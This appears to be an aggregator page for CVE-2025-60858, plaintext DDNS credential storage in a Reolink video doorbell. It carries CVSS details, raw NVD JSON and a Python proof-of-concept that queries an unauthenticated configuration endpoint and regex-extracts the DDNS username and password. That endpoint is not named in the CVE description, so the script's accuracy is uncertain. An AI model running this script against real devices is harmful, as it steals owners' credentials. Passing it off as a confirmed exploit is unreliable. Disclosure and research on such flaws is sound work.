Security Vulnerability Report
中文
CVE-2025-60858 CVSS 7.5 HIGH

CVE-2025-60858

Published: 2025-10-28 16:15:39
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Reolink Video Doorbell Wi-Fi DB_566128M5MP_W stores and transmits DDNS credentials in plaintext within its configuration and update scripts, allowing attackers to intercept or extract sensitive information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Reolink Video Doorbell Wi-Fi DB_566128M5MP_W (固件版本 < 未知修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60858 PoC - Reolink DDNS Credential Extraction # This PoC demonstrates the extraction of plaintext DDNS credentials # from Reolink Video Doorbell Wi-Fi configuration files import requests import re import json def extract_ddns_credentials(target_ip): """ Extract DDNS credentials from Reolink device configuration """ # Target configuration endpoint config_url = f"http://{target_ip}/cgi-bin/config.cgi?action=list&group=ddns" try: # Request DDNS configuration without authentication response = requests.get(config_url, timeout=10) if response.status_code == 200: # Parse configuration for plaintext credentials config_data = response.text # Extract DDNS credentials using regex patterns username = re.search(r'ddns_username[=]\s*([^"&\n]+)', config_data) password = re.search(r'ddns_password[=]\s*([^"&\n]+)', config_data) server = re.search(r'ddns_server[=]\s*([^"&\n]+)', config_data) if username and password: credentials = { 'cve_id': 'CVE-2025-60858', 'username': username.group(1), 'password': password.group(1), 'server': server.group(1) if server else 'Unknown', 'device': 'Reolink Video Doorbell Wi-Fi DB_566128M5MP_W', 'vulnerability': 'Plaintext DDNS credential storage' } return credentials except Exception as e: print(f"Error: {e}") return None # Usage example # result = extract_ddns_credentials('192.168.1.100') # print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60858", "sourceIdentifier": "[email protected]", "published": "2025-10-28T16:15:39.277", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reolink Video Doorbell Wi-Fi DB_566128M5MP_W stores and transmits DDNS credentials in plaintext within its configuration and update scripts, allowing attackers to intercept or extract sensitive information."}, {"lang": "es", "value": "Reolink Video Doorbell Wi-Fi DB_566128M5MP_W almacena y transmite credenciales DDNS en texto plano dentro de sus scripts de configuración y actualización, permitiendo a los atacantes interceptar o extraer información sensible."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://cybermaya.in/posts/Post-47/", "source": "[email protected]"}, {"url": "https://reolink.com/download-center/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.